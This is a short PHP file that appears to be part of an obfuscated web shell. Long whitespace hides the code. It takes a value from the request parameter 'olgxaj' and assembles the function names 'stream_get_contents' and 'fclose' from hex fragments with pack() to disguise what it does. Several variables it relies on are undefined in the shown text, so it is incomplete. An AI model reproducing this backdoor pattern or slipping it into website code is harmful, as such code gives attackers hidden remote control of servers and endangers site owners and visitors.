<?php																																										
																																										
																																										trim($_REQUEST['olgxaj']);
 
$rfind6 = pack("H*", '73' . '74' . $attribute11 . '65' . '61' . '6d' . $attribute4 . '67' . $attribute6 . $attribute7 . '5f' . $attribute5 . '6f' . $attribute10 . $attribute7 . $attribute6 . $attribute10 . $attribute7 . $attribute1);
$rfind7 = pack("H*", $attribute9 . '63' . '6c' . $attribute12 . $attribute1 . '65');

